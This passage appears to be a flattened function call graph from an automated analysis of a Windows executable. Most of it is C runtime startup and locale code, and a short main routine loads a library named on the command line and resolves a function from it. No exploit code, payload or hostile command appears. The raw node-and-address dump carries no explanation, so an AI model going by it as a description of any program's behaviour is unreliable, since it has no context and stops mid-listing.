__mtinitlocknum 66 API calls 4664->4665 4666 b25bdc 4665->4666 4667 b235ee __mtinitlocknum 66 API calls 4666->4667 4668 b25be4 4667->4668 4669 b235ee __mtinitlocknum 66 API calls 4668->4669 4670 b25bec 4669->4670 4671 b235ee __mtinitlocknum 66 API calls 4670->4671 4672 b25bf4 4671->4672 4673 b235ee __mtinitlocknum 66 API calls 4672->4673 4674 b25c02 4673->4674 4675 b235ee __mtinitlocknum 66 API calls 4674->4675 4676 b25c0d 4675->4676 4677 b235ee __mtinitlocknum 66 API calls 4676->4677 4678 b25c18 4677->4678 4679 b235ee __mtinitlocknum 66 API calls 4678->4679 4680 b25c23 4679->4680 4681 b235ee __mtinitlocknum 66 API calls 4680->4681 4682 b25c2e 4681->4682 4683 b235ee __mtinitlocknum 66 API calls 4682->4683 4684 b25c39 4683->4684 4685 b235ee __mtinitlocknum 66 API calls 4684->4685 4686 b25c44 4685->4686 4687 b235ee __mtinitlocknum 66 API calls 4686->4687 4688 b25c4f 4687->4688 4689 b235ee __mtinitlocknum 66 API calls 4688->4689 4690 b25c5a 4689->4690 4691 b235ee __mtinitlocknum 66 API calls 4690->4691 4692 b25c65 4691->4692 4693 b235ee __mtinitlocknum 66 API calls 4692->4693 4693->4608 4694->4580 4407 b2543d 4408 b21411 __amsg_exit 66 API calls 4407->4408 4409 b25444 4408->4409 4695 b21242 4696 b21251 4695->4696 4697 b21257 4695->4697 4698 b21697 _raise 66 API calls 4696->4698 4701 b216bc 4697->4701 4698->4697 4700 b2125c _raise 4702 b21555 _doexit 66 API calls 4701->4702 4703 b216c7 4702->4703 4703->4700 4476 b21281 4479 b2283c 4476->4479 4478 b21286 4478->4478 4480 b22861 4479->4480 4481 b2286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4479->4481 4480->4481 4482 b22865 4480->4482 4481->4482 4482->4478 3628 2541140 3629 254114d 3628->3629 3630 2541175 _swprintf 3629->3630 3631 25422c0 3630->3631 3632 25411c4 _swprintf 3631->3632 3635 25412a0 NdrClientCall2 3632->3635 3634 2541216 3635->3634 4410 2541640 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4704 b24247 4714 b241cb 4704->4714 4706 b210cc __setmbcp_nolock 5 API calls 4708 b2442a 4706->4708 4709 b242b6 IsValidCodePage 4710 b242c8 GetCPInfo 4709->4710 4711 b24272 setSBCS 4709->4711 4710->4711 4713 b242db __setmbcp_nolock 4710->4713 4711->4706 4721 b23f0d GetCPInfo 4713->4721 4731 b24144 4714->4731 4717 b241ea GetOEMCP 4720 b241fa 4717->4720 4718 b24208 4719 b2420d GetACP 4718->4719 4718->4720 4719->4720 4720->4709 4720->4711 4720->4713 4722 b23f41 __setmbcp_nolock 4721->4722 4730 b23ff3 4721->4730 4786 b25fe2 4722->4786 4726 b210cc __setmbcp_nolock 5 API calls 4728 b2409e 4726->4728 4728->4713 4729 b26415 ___crtLCMapStringA 101 API calls 4729->4730 4730->4726 4732 b24157 4731->4732 4738 b241a4 4731->4738 4733 b22345 __getptd 66 API calls 4732->4733 4734 b2415c 4733->4734 4735 b24184 4734->4735 4739 b23e04 4734->4739 4735->4738 4754 b240a0 4735->4754 4738->4717 4738->4718 4740 b23e10 _raise 4739->4740 4741 b22345 __getptd 66 API calls 4740->4741 4742 b23e15 4741->4742 4743 b23e43 4742->4743 4745 b23e27 4742->4745 4744 b22aa0 __lock 66 API calls 4743->4744 4746 b23e4a 4744->4746 4747 b22345 __getptd 66 API calls 4745->4747 4770 b23dc6 4746->4770 4749 b23e2c 4747->4749 4752 b23e3a _raise 4749->4752 4753 b21411 __amsg_exit 66 API calls 4749->4753 4752->4735 4753->4752 4755 b240ac _raise 4754->4755 4756 b22345 __getptd 66 API calls 4755->4756 4757 b240b1 4756->4757 4758 b22aa0 __lock 66 API calls 4757->4758 4766 b240c3 4757->4766 4759 b240e1 4758->4759 4760 b2412a 4759->4760 4761 b24112 InterlockedIncrement 4759->4761 4762 b240f8 InterlockedDecrement 4759->4762 4782 b2413b 4760->4782 4761->4760 4762->4761 4765 b24103 4762->4765 4763 b21411 __amsg_exit 66 API calls 4767 b240d1 _raise 4763->4767 4765->4761 4768 b235ee __mtinitlocknum 66 API calls 4765->4768 4766->4763 4766->4767 4767->4738 4769 b24111 4768->4769 4769->4761 4771 b23dca 4770->4771 4777 b23dfc 4770->4777 4772 b23c9e ___addlocaleref 8 API calls 4771->4772 4771->4777 4773 b23ddd 4772->4773 4774 b23d2d ___removelocaleref 8 API calls 4773->4774 4773->4777 4775 b23de8 4774->4775 4776 b23b55 ___freetlocinfo 66 API calls 4775->4776 4775->4777 4776->4777 4778 b23e6e 4777->4778 4781 b229c6 LeaveCriticalSection 4778->4781 4780 b23e75 4780->4749 4781->4780 4785 b229c6 LeaveCriticalSection 4782->4785 4784 b24142 4784->4766 4785->4784 4787 b24144 _LocaleUpdate::_LocaleUpdate 76 API calls 4786->4787 4788 b25ff5 4787->4788 4796 b25e28 4788->4796 4791 b26415 4792 b24144 _LocaleUpdate::_LocaleUpdate 76 API calls 4791->4792 4793 b26428 4792->4793 4884 b26070 4793->4884 4797 b25e74 4796->4797 4798 b25e49 GetStringTypeW 4796->4798 4799 b25f5b 4797->4799 4800 b25e61 4797->4800 4798->4800 4801 b25e69 GetLastError 4798->4801 4824 b26b1a GetLocaleInfoA 4799->4824 4802 b25ead MultiByteToWideChar 4800->4802 4819 b25f55 4800->4819 4801->4797 4808 b25eda 4802->4808 4802->4819 4805 b210cc __setmbcp_nolock 5 API calls 4806 b23fae 4805->4806 4806->4791 4807 b25fac GetStringTypeA 4811 b25fc7 4807->4811 4807->4819 4812 b25eef __alloca_probe_16 __setmbcp_nolock 4808->4812 4813 b254b5 _malloc 66 API calls 4808->4813 4810 b25f28 MultiByteToWideChar 4815 b25f3e GetStringTypeW 4810->4815 4816 b25f4f 4810->4816 4817 b235ee __mtinitlocknum 66 API calls 4811->4817 4812->4810 4812->4819 4813->4812 4815->4816 4820 b25446 4816->4820 4817->4819 4819->4805 4821 b25452 4820->4821 4822 b25463 4820->4822 4821->4822 4823 b235ee __mtinitlocknum 66 API calls 4821->4823 4822->4819 4823->4822 4825 b26b4d 4824->4825 4826 b26b48 4824->4826 4855 b26b04 4825->4855 4828 b210cc __setmbcp_nolock 5 API calls 4826->4828 4829 b25f7f 4828->4829 4829->4807 4829->4819 4830 b26b63 4829->4830 4831 b26ba3 GetCPInfo 4830->4831 4832 b26c2d 4830->4832 4833 b26bba 4831->4833 4834 b26c18 MultiByteToWideChar 4831->4834 4835 b210cc __setmbcp_nolock 5 API calls 4832->4835 4833->4834 4836 b26bc0 GetCPInfo 4833->4836 4834->4832 4839 b26bd3 _strlen 4834->4839 4837 b25fa0 4835->4837 4836->4834 4838 b26bcd 4836->4838 4837->4807 4837->4819 4838->4834 4838->4839 4840 b254b5 _malloc 66 API calls 4839->4840 4844 b26c05 __alloca_probe_16 __setmbcp_nolock 4839->4844 4840->4844 4841 b26c62 MultiByteToWideChar 4842 b26c7a 4841->4842 4843 b26c99 4841->4843 4846 b26c81 WideCharToMultiByte 4842->4846 4847 b26c9e 4842->4847 4845 b25446 __freea 66 API calls 4843->4845 4844->4832 4844->4841 4845->4832 4846->4843 4848 b26ca9 WideCharToMultiByte 4847->4848 4849 b26cbd 4847->4849 4848->4843 4848->4849 4850 b23730 __calloc_crt 66 API calls 4849->4850 4851 b26cc5 4850->4851 4851->4843 4852 b26cce WideCharToMultiByte 4851->4852 4852->4843 4853 b26ce0 4852->4853 4854 b235ee __mtinitlocknum 66 API calls 4853->4854 4854->4843 4858 b26f7a 4855->4858 4859 b26f93 4858->4859 4862 b26d4b 4859->4862 4863 b24144 _LocaleUpdate::_LocaleUpdate 76 API calls 4862->4863 4866 b26d60 4863->4866 4864 b26d72 4865 b22c72 _raise 66 API calls 4864->4865 4867 b26d77 4865->4867 4866->4864 4869 b26daf 4866->4869 4868 b22c0a _raise 6 API calls 4867->4868 4871 b26b15 4868->4871 4872 b26df4 4869->4872 4874 b269e5 4869->4874 4871->4826 4872->4871 4873 b22c72 _raise 66 API calls 4872->4873 4873->4871 4875 b24144 _LocaleUpdate::_LocaleUpdate 76 API calls 4874->4875 4876 b269f9 4875->4876 4877 b26a06 4876->4877 4881 b26acc 4876->4881 4877->4869 4880 b25fe2 ___crtGetStringTypeA 90 API calls 4880->4877 4882 b24144 _LocaleUpdate::_LocaleUpdate 76 API calls 4881->4882 4883 b26a2e 4882->4883 4883->4880 4885 b26091 LCMapStringW 4884->4885 4889 b260ac 4884->4889 4886 b260b4 GetLastError 4885->4886 4885->4889 4886->4889 4887 b262aa 4891 b26b1a ___ansicp 90 API calls 4887->4891 4888 b26106 4890 b2611f MultiByteToWideChar 4888->4890 4908 b262a1 4888->4908 4889->4887 4889->4888 4893 b2614c 4890->4893 4890->4908 4895 b262d2 4891->4895 4892 b210cc __setmbcp_nolock 5 API calls 4894 b23fce 4892->4894 4901 b254b5 _malloc 66 API calls 4893->4901 4911 b26165 __alloca_probe_16 4893->4911 4894->4729 4896 b263c6 LCMapStringA 4895->4896 4897 b262eb 4895->4897 4895->4908 4900 b26322 4896->4900 4898 b26b63 ___convertcp 73 API calls 4897->4898 4902 b262fd 4898->4902 4899 b2619d MultiByteToWideChar 4903 b261b6 LCMapStringW 4899->4903 4904 b26298 4899->4904 4905 b263ed 4900->4905 4906 b235ee __mtinitlocknum 66 API calls 4900->4906 4901->4911 4907 b26307 LCMapStringA 4902->4907 4902->4908 4903->4904 4910 b261d7 4903->4910 4909 b25446 __freea 66 API calls 4904->4909 4905->4908 4913 b235ee __mtinitlocknum 66 API calls 4905->4913 4906->4905 4907->4900 4916 b26329 4907->4916 4908->4892 4909->4908 4912 b261e0 4910->4912 4915 b26209 4910->4915 4911->4899 4911->4908 4912->4904 4914 b261f2 LCMapStringW 4912->4914 4913->4908 4914->4904 4918 b26224 __alloca_probe_16 4915->4918 4920 b254b5 _malloc 66 API calls 4915->4920 4919 b2633a __alloca_probe_16 __setmbcp_nolock 4916->4919 4921 b254b5 _malloc 66 API calls 4916->4921 4917 b26258 LCMapStringW 4922 b26292 4917->4922 4923 b26270 WideCharToMultiByte 4917->4923 4918->4904 4918->4917 4919->4900 4925 b26378 LCMapStringA 4919->4925 4920->4918 4921->4919 4924 b25446 __freea 66 API calls 4922->4924 4923->4922 4924->4904 4927 b26394 4925->4927 4928 b26398 4925->4928 4930 b25446 __freea 66 API calls 4927->4930 4929 b26b63 ___convertcp 73 API calls 4928->4929 4929->4927 4930->4900 3636 b21104 3682 b2264c 3636->3682 3638 b21110 GetStartupInfoW 3640 b21133 3638->3640 3683 b2261b HeapCreate 3640->3683 3642 b21183 3748 b2248e GetModuleHandleW 3642->3748 3645 b21189 3646 b21195 __RTC_Initialize 3645->3646 3647 b2118d 3645->3647 3685 b21dde 3646->3685 3648 b210db _fast_error_exit 66 API calls 3647->3648 3649 b21194 3648->3649 3649->3646 3651 b211a2 3652 b211a6 3651->3652 3653 b211ae GetCommandLineW 3651->3653 3781 b21411 3652->3781 3700 b21d81 GetEnvironmentStringsW 3653->3700 3657 b211bd 3788 b21cd3 GetModuleFileNameW 3657->3788 3659 b211c7 3660 b211d3 3659->3660 3661 b211cb 3659->3661 3708 b21aa4 3660->3708 3663 b21411 __amsg_exit 66 API calls 3661->3663 3665 b211d2 3663->3665 3665->3660 3666 b211e4 3720 b214d0 3666->3720 3667 b211dc 3668 b21411 __amsg_exit 66 API calls 3667->3668 3670 b211e3 3668->3670 3670->3666 3671 b211ea 3672 b211ef 3671->3672 3675 b211f6 __wwincmdln 3671->3675 3673 b21411 __amsg_exit 66 API calls 3672->3673 3674 b211f5 3673->3674 3674->3675 3675->3674 3726 b21000 CoInitialize CreateMutexW 3675->3726 3677 b21216 3678 b21224 3677->3678 3792 b21681 3677->3792 3795 b216ad 3678->3795 3681 b21229 _raise 3682->3638 3684 b21177 3683->3684 3684->3642 3740 b210db 3684->3740 3798 b2264c 3685->3798 3687 b21dea GetStartupInfoA 3799 b23730 3687->3799 3689 b22029 _raise 3689->3651 3690 b21fa6 GetStdHandle 3695 b21f70 3690->3695 3691 b2200b SetHandleCount 3691->3689 3692 b23730 __calloc_crt 66 API calls 3696 b21e0b 3692->3696 3693 b21fb8 GetFileType 3693->3695 3694 b21ef3 3694->3689 3694->3695 3698 b21f1c GetFileType 3694->3698 3804 b2317c 3694->3804 3695->3689 3695->3690 3695->3691 3695->3693 3697 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3695->3697 3696->3689 3696->3692 3696->3694 3696->3695 3697->3695 3698->3694 3701 b21d92 3700->3701 3702 b21d96 3700->3702 3701->3657 3703 b236eb __malloc_crt 66 API calls 3702->3703 3704 b21db7 3703->3704 3705 b21dbe FreeEnvironmentStringsW 3704->3705 4158 b237f0 3704->4158 3705->3657 3709 b21abc _wcslen 3708->3709 3713 b211d8 3708->3713 3710 b23730 __calloc_crt 66 API calls 3709->3710 3718 b21ae0 _wcslen 3710->3718 3711 b21b45 3712 b235ee __mtinitlocknum 66 API calls 3711->3712 3712->3713 3713->3666 3713->3667 3714 b23730 __calloc_crt 66 API calls 3714->3718 3715 b21b6b 3716 b235ee __mtinitlocknum 66 API calls 3715->3716 3716->3713 3718->3711 3718->3713 3718->3714 3718->3715 3719 b22ae2 __invoke_watson 10 API calls 3718->3719 4162 b2367c 3718->4162 3719->3718 3721 b214de __IsNonwritableInCurrentImage 3720->3721 4171 b22dc3 3721->4171 3723 b214fc __initterm_e 3725 b2151b __IsNonwritableInCurrentImage __initterm 3723->3725 4175 b22dac 3723->4175 3725->3671 3727 b21035 GetCommandLineW CommandLineToArgvW 3726->3727 3728 b2101f GetLastError 3726->3728 3730 b21067 3727->3730 3731 b21056 PathFileExistsW 3727->3731 3728->3727 3729 b2102c 3728->3729 3729->3677 3733 b21084 LoadLibraryW 3730->3733 3731->3730 3732 b2106e PathFileExistsW 3731->3732 3732->3730 3732->3733 3734 b21091 GetProcAddress 3733->3734 3735 b210aa CloseHandle CoUninitialize 3733->3735 3738 b210a3 FreeLibrary 3734->3738 3739 b210a1 3734->3739 3736 b210c2 3735->3736 3737 b210bb LocalFree 3735->3737 3736->3677 3737->3736 3738->3735 3739->3738 3741 b210e9 3740->3741 3742 b210ee 3740->3742 3743 b218c4 __FF_MSGBANNER 66 API calls 3741->3743 3744 b21719 __NMSG_WRITE 66 API calls 3742->3744 3743->3742 3745 b210f6 3744->3745 3746 b21465 __mtinitlocknum 3 API calls 3745->3746 3747 b21100 3746->3747 3747->3642 3749 b224a2 3748->3749 3750 b224a8 3748->3750 3751 b213e1 __crt_waiting_on_module_handle 2 API calls 3749->3751 3752 b224b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3750->3752 3753 b22611 3750->3753 3751->3750 3755 b224fc TlsAlloc 3752->3755 4287 b221a8 3753->4287 3757 b22616 3755->3757 3758 b2254a TlsSetValue 3755->3758 3757->3645 3758->3757 3759 b2255b 3758->3759 4276 b216cb 3759->4276 3762 b2207e __encode_pointer 6 API calls 3763 b2256b 3762->3763 3764 b2207e __encode_pointer 6 API calls 3763->3764 3765 b2257b 3764->3765 3766 b2207e __encode_pointer 6 API calls 3765->3766 3767 b2258b 3766->3767 3768 b2207e __encode_pointer 6 API calls 3767->3768 3769 b2259b 3768->3769 4283 b22924 3769->4283 3772 b220f9 __decode_pointer 6 API calls 3773 b225bc 3772->3773 3773->3753 3774 b23730 __calloc_crt 66 API calls 3773->3774 3775 b225d5 3774->3775 3775->3753 3776 b220f9 __decode_pointer 6 API calls 3775->3776 3777 b225ef 3776->3777 3777->3753 3778 b225f6 3777->3778 3779 b221e5 __mtinit 66 API calls 3778->3779 3780 b225fe GetCurrentThreadId 3779->3780 3780->3757 3782 b218c4 __FF_MSGBANNER 66 API calls 3781->3782 3783 b2141b 3782->3783 3784 b21719 __NMSG_WRITE 66 API calls 3783->3784 3785 b21423 3784->3785 3786 b220f9 __decode_pointer 6 API calls 3785->3786 3787 b211ad 3786->3787 3787->3653 3789 b21d08 _wparse_cmdline 3788->3789 3790 b236eb __malloc_crt 66 API calls 3789->3790 3791 b21d4b _wparse_cmdline 3789->3791 3790->3791 3791->3659 4301 b21555 3792->4301 3794 b21692 3794->3678 3796 b21555 _doexit 66 API calls 3795->3796 3797 b216b8 3796->3797 3797->3681 3798->3687 3800 b23739 3799->3800 3802 b23776 3800->3802 3803 b23757 Sleep 3800->3803 3808 b2557f 3800->3808 3802->3696 3803->3800 4157 b2264c 3804->4157 3806 b23188 InitializeCriticalSectionAndSpinCount 3807 b231cc _raise 3806->3807 3807->3694 3809 b2558b _raise 3808->3809 3810 b255a3 3809->3810 3820 b255c2 __setmbcp_nolock 3809->3820 3821 b22c72 3810->3821 3814 b25634 HeapAlloc 3814->3820 3817 b255b8 _raise 3817->3800 3820->3814 3820->3817 3827 b22aa0 3820->3827 3834 b24dc3 3820->3834 3840 b2567b 3820->3840 3843 b231eb 3820->3843 3846 b222cc GetLastError 3821->3846 3823 b22c77 3824 b22c0a 3823->3824 3825 b220f9 __decode_pointer 6 API calls 3824->3825 3826 b22c1a __invoke_watson 3825->3826 3828 b22ab5 3827->3828 3829 b22ac8 EnterCriticalSection 3827->3829 3941 b229dd 3828->3941 3829->3820 3831 b22abb 3831->3829 3832 b21411 __amsg_exit 65 API calls 3831->3832 3833 b22ac7 3832->3833 3833->3829 3836 b24df1 3834->3836 3835 b24e8a 3839 b24e93 3835->3839 4152 b249da 3835->4152 3836->3835 3836->3839 4145 b2492a 3836->4145 3839->3820 4156 b229c6 LeaveCriticalSection 3840->4156 3842 b25682 3842->3820 3844 b220f9 __decode_pointer 6 API calls 3843->3844 3845 b231fb 3844->3845 3845->3820 3860 b22174 TlsGetValue 3846->3860 3849 b22339 SetLastError 3849->3823 3850 b23730 __calloc_crt 63 API calls 3851 b222f7 3850->3851 3851->3849 3865 b220f9 TlsGetValue 3851->3865 3854 b22330 3893 b235ee 3854->3893 3855 b22318 3875 b221e5 3855->3875 3858 b22320 GetCurrentThreadId 3858->3849 3859 b22336 3859->3849 3861 b221a4 3860->3861 3862 b22189 3860->3862 3861->3849 3861->3850 3863 b220f9 __decode_pointer 6 API calls 3862->3863 3864 b22194 TlsSetValue 3863->3864 3864->3861 3866 b22132 GetModuleHandleW 3865->3866 3867 b22111 3865->3867 3869 b22142 3866->3869 3870 b2214d GetProcAddress 3866->3870 3867->3866 3868 b2211b TlsGetValue 3867->3868 3873 b22126 3868->3873 3906 b213e1 3869->3906 3872 b2212a 3870->3872 3872->3854 3872->3855 3873->3866 3873->3872 3910 b2264c 3875->3910 3877 b221f1 GetModuleHandleW 3878 b22201 3877->3878 3879 b22207 3877->3879 3880 b213e1 __crt_waiting_on_module_handle 2 API calls 3878->3880 3881 b22243 3879->3881 3882 b2221f GetProcAddress GetProcAddress 3879->3882 3880->3879 3883 b22aa0 __lock 62 API calls 3881->3883 3882->3881 3884 b22262 InterlockedIncrement 3883->3884 3911 b222ba 3884->3911 3887 b22aa0 __lock 62 API calls 3888 b22283 3887->3888 3914 b23c9e InterlockedIncrement 3888->3914 3890 b222a1 3926 b222c3 3890->3926 3892 b222ae _raise 3892->3858 3894 b235fa _raise 3893->3894 3895 b23639 3894->3895 3897 b22aa0 __lock 64 API calls 3894->3897 3898 b23673 _raise _realloc 3894->3898 3896 b2364e HeapFree 3895->3896 3895->3898 3896->3898 3899 b23660 3896->3899 3900 b23611 ___sbh_find_block 3897->3900 3898->3859 3901 b22c72 _raise 64 API calls 3899->3901 3903 b2362b 3900->3903 3931 b24614 3900->3931 3902 b23665 GetLastError 3901->3902 3902->3898 3937 b23644 3903->3937 3907 b213ec Sleep GetModuleHandleW 3906->3907 3908 b2140a 3907->3908 3909 b2140e 3907->3909 3908->3907 3908->3909 3909->3870 3909->3872 3910->3877 3929 b229c6 LeaveCriticalSection 3911->3929 3913 b2227c 3913->3887 3915 b23cbf 3914->3915 3916 b23cbc InterlockedIncrement 3914->3916 3917 b23cc9 InterlockedIncrement 3915->3917 3918 b23ccc 3915->3918 3916->3915 3917->3918 3919 b23cd6 InterlockedIncrement 3918->3919 3920 b23cd9 3918->3920 3919->3920 3921 b23ce3 InterlockedIncrement 3920->3921 3922 b23ce6 3920->3922 3921->3922 3923 b23cff InterlockedIncrement 3922->3923 3924 b23d0f InterlockedIncrement 3922->3924 3925 b23d1a InterlockedIncrement 3922->3925 3923->3922 3924->3922 3925->3890 3930 b229c6 LeaveCriticalSection 3926->3930 3928 b222ca 3928->3892 3929->3913 3930->3928 3932 b248f5 ___sbh_free_block 3931->3932 3933 b24653 3931->3933 3932->3903 3933->3932 3934 b2483f VirtualFree 3933->3934 3935 b248a3 3934->3935 3935->3932 3936 b248b2 VirtualFree HeapFree 3935->3936 3936->3932 3940 b229c6 LeaveCriticalSection 3937->3940 3939 b2364b 3939->3895 3940->3939 3942 b229e9 _raise 3941->3942 3943 b22a0f 3942->3943 3967 b218c4 3942->3967 3949 b22a1f _raise 3943->3949 4013 b236eb 3943->4013 3949->3831 3951 b22a40 3955 b22aa0 __lock 66 API calls 3951->3955 3952 b22a31 3954 b22c72 _raise 66 API calls 3952->3954 3954->3949 3956 b22a47 3955->3956 3957 b22a7b 3956->3957 3958 b22a4f 3956->3958 3960 b235ee __mtinitlocknum 66 API calls 3957->3960 3959 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3958->3959 3961 b22a5a 3959->3961 3962 b22a6c 3960->3962 3961->3962 3963 b235ee __mtinitlocknum 66 API calls 3961->3963 4018 b22a97 3962->4018 3965 b22a66 3963->3965 3966 b22c72 _raise 66 API calls 3965->3966 3966->3962 4021 b235a3 3967->4021 3970 b235a3 __set_error_mode 66 API calls 3972 b218d8 3970->3972 3971 b21719 __NMSG_WRITE 66 API calls 3973 b218f0 3971->3973 3972->3971 3974 b218fa 3972->3974 3975 b21719 __NMSG_WRITE 66 API calls 3973->3975 3976 b21719 3974->3976 3975->3974 3977 b2172d 3976->3977 3978 b235a3 __set_error_mode 63 API calls 3977->3978 4009 b21888 3977->4009 3979 b2174f 3978->3979 3980 b2188d GetStdHandle 3979->3980 3982 b235a3 __set_error_mode 63 API calls 3979->3982 3981 b2189b _strlen 3980->3981 3980->4009 3985 b218b4 WriteFile 3981->3985 3981->4009 3983 b21760 3982->3983 3983->3980 3984 b21772 3983->3984 3984->4009 4027 b2353b 3984->4027 3985->4009 3988 b217a8 GetModuleFileNameA 3989 b217c6 3988->3989 3994 b217e9 _strlen 3988->3994 3991 b2353b _strcpy_s 63 API calls 3989->3991 3993 b217d6 3991->3993 3993->3994 3995 b22ae2 __invoke_watson 10 API calls 3993->3995 4005 b2182c 3994->4005 4043 b233f0 3994->4043 3995->3994 4000 b22ae2 __invoke_watson 10 API calls 4003 b21850 4000->4003 4001 b2337c _strcat_s 63 API calls 4004 b21864 4001->4004 4002 b22ae2 __invoke_watson 10 API calls 4002->4005 4003->4001 4006 b21875 4004->4006 4008 b22ae2 __invoke_watson 10 API calls 4004->4008 4052 b2337c 4005->4052 4061 b23213 4006->4061 4008->4006 4010 b21465 4009->4010 4112 b2143a GetModuleHandleW 4010->4112 4017 b236f4 4013->4017 4015 b22a2a 4015->3951 4015->3952 4016 b2370b Sleep 4016->4017 4017->4015 4017->4016 4115 b254b5 4017->4115 4144 b229c6 LeaveCriticalSection 4018->4144 4020 b22a9e 4020->3949 4022 b235b2 4021->4022 4023 b22c72 _raise 66 API calls 4022->4023 4024 b218cb 4022->4024 4025 b235d5 4023->4025 4024->3970 4024->3972 4026 b22c0a _raise 6 API calls 4025->4026 4026->4024 4028 b23553 4027->4028 4029 b2354c 4027->4029 4030 b22c72 _raise 66 API calls 4028->4030 4029->4028 4034 b23579 4029->4034 4031 b23558 4030->4031 4032 b22c0a _raise 6 API calls 4031->4032 4033 b21794 4032->4033 4033->3988 4036 b22ae2 4033->4036 4034->4033 4035 b22c72 _raise 66 API calls 4034->4035 4035->4031 4088 b25320 4036->4088 4038 b22b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4039 b22beb GetCurrentProcess TerminateProcess 4038->4039 4040 b22bdf __invoke_watson 4038->4040 4090 b210cc 4039->4090 4040->4039 4042 b217a5 4042->3988 4047 b23402 4043->4047 4044 b23406 4045 b21819 4044->4045 4046 b22c72 _raise 66 API calls 4044->4046 4045->4002 4045->4005 4048 b23422 4046->4048 4047->4044 4047->4045 4050 b2344c 4047->4050 4049 b22c0a _raise 6 API calls 4048->4049 4049->4045 4050->4045 4051 b22c72 _raise 66 API calls 4050->4051 4051->4048 4055 b23394 4052->4055 4056 b2338d 4052->4056 4053 b22c72 _raise 66 API calls 4054 b23399 4053->4054 4057 b22c0a _raise 6 API calls 4054->4057 4055->4053 4056->4055 4058 b233c8 4056->4058 4059 b2183f 4057->4059 4058->4059 4060 b22c72 _raise 66 API calls 4058->4060 4059->4000 4059->4003 4060->4054 4099 b220f0 4061->4099 4064 b23236 LoadLibraryA 4066 b23360 4064->4066 4067 b2324b GetProcAddress 4064->4067 4065 b232be 4071 b220f9 __decode_pointer 6 API calls 4065->4071 4084 b232e8 4065->4084 4066->4009 4067->4066 4069 b23261 4067->4069 4068 b23313 4073 b220f9 __decode_pointer 6 API calls 4068->4073 4102 b2207e TlsGetValue 4069->4102 4070 b220f9 __decode_pointer 6 API calls 4081 b2332b 4070->4081 4074 b232db 4071->4074 4073->4066 4076 b220f9 __decode_pointer 6 API calls 4074->4076 4076->4084 4077 b2207e __encode_pointer 6 API calls 4078 b2327c GetProcAddress 4077->4078 4079 b2207e __encode_pointer 6 API calls 4078->4079 4080 b23291 GetProcAddress 4079->4080 4082 b2207e __encode_pointer 6 API calls 4080->4082 4081->4068 4083 b220f9 __decode_pointer 6 API calls 4081->4083 4085 b232a6 4082->4085 4083->4068 4084->4068 4084->4070 4085->4065 4086 b232b0 GetProcAddress 4085->4086 4087 b2207e __encode_pointer 6 API calls 4086->4087 4087->4065 4089 b2532c __VEC_memzero 4088->4089 4089->4038 4091 b210d6 IsDebuggerPresent 4090->4091 4092 b210d4 4090->4092 4098 b228d2 4091->4098 4092->4042 4095 b21358 SetUnhandledExceptionFilter UnhandledExceptionFilter 4096 b21375 __invoke_watson 4095->4096 4097 b2137d GetCurrentProcess TerminateProcess 4095->4097 4096->4097 4097->4042 4098->4095 4100 b2207e __encode_pointer 6 API calls 4099->4100 4101 b220f7 4100->4101 4101->4064 4101->4065 4103 b22096 4102->4103 4104 b220b7 GetModuleHandleW 4102->4104 4103->4104 4107 b220a0 TlsGetValue 4103->4107 4105 b220d2 GetProcAddress 4104->4105 4106 b220c7 4104->4106 4111 b220af GetProcAddress 4105->4111 4108 b213e1 __crt_waiting_on_module_handle 2 API calls 4106->4108 4109 b220ab 4107->4109 4110 b220cd 4108->4110 4109->4104 4109->4111 4110->4105 4110->4111 4111->4077 4113 b2145e ExitProcess 4112->4113 4114 b2144e GetProcAddress 4112->4114 4114->4113 4116 b25568 4115->4116 4124 b254c7 4115->4124 4117 b231eb __calloc_impl 6 API calls 4116->4117 4118 b2556e 4117->4118 4119 b22c72 _raise 65 API calls 4118->4119 4131 b25560 4119->4131 4120 b218c4 __FF_MSGBANNER 65 API calls 4120->4124 4121 b21719 __NMSG_WRITE 65 API calls 4121->4124 4123 b25524 HeapAlloc 4123->4124 4124->4120 4124->4121 4124->4123 4125 b21465 __mtinitlocknum 3 API calls 4124->4125 4126 b25554 4124->4126 4127 b231eb __calloc_impl 6 API calls 4124->4127 4129 b25559 4124->4129 4124->4131 4132 b25466 4124->4132 4125->4124 4128 b22c72 _raise 65 API calls 4126->4128 4127->4124 4128->4129 4130 b22c72 _raise 65 API calls 4129->4130 4130->4131 4131->4017 4133 b25472 _raise 4132->4133 4134 b254a3 _raise 4133->4134 4135 b22aa0 __lock 66 API calls 4133->4135 4134->4124 4136 b25488 4135->4136 4137 b24dc3 ___sbh_alloc_block 5 API calls 4136->4137 4138 b25493 4137->4138 4140 b254ac 4138->4140 4143 b229c6 LeaveCriticalSection 4140->4143 4142 b254b3 4142->4134 4143->4142 4144->4020 4146 b24971 HeapAlloc 4145->4146 4147 b2493d HeapReAlloc 4145->4147 4148 b2495b 4146->4148 4150 b24994 VirtualAlloc 4146->4150 4147->4148 4149 b2495f 4147->4149 4148->3835 4149->4146 4150->4148 4151 b249ae HeapFree 4150->4151 4151->4148 4153 b249f1 VirtualAlloc 4152->4153 4155 b24a38 4153->4155 4155->3839 4156->3842 4157->3806 4159 b23808 4158->4159 4160 b2382f __VEC_memcpy 4159->4160 4161 b21dd3 4159->4161 4160->4161 4161->3705 4163 b23694 4162->4163 4164 b2368d 4162->4164 4165 b22c72 _raise 66 API calls 4163->4165 4164->4163 4169 b236c0 4164->4169 4166 b23699 4165->4166 4167 b22c0a _raise 6 API calls 4166->4167 4168 b236a8 4167->4168 4168->3718 4169->4168 4170 b22c72 _raise 66 API calls 4169->4170 4170->4166 4172 b22dc9 4171->4172 4173 b2207e __encode_pointer 6 API calls 4172->4173 4174 b22de1 4172->4174 4173->4172 4174->3723 4178 b22d70 4175->4178 4177 b22db9 4177->3725 4179 b22d7c _raise 4178->4179 4186 b2147d 4179->4186 4185 b22d9d _raise 4185->4177 4187 b22aa0 __lock 66 API calls 4186->4187 4188 b21484 4187->4188 4189 b22c85 4188->4189 4190 b220f9 __decode_pointer 6 API calls 4189->4190 4191 b22c99 4190->4191 4192 b220f9 __decode_pointer 6 API calls 4191->4192 4193 b22ca9 4192->4193 4201 b22d2c 4193->4201 4209 b2539a 4193->4209 4195 b22cc7 4197 b22ceb 4195->4197 4205 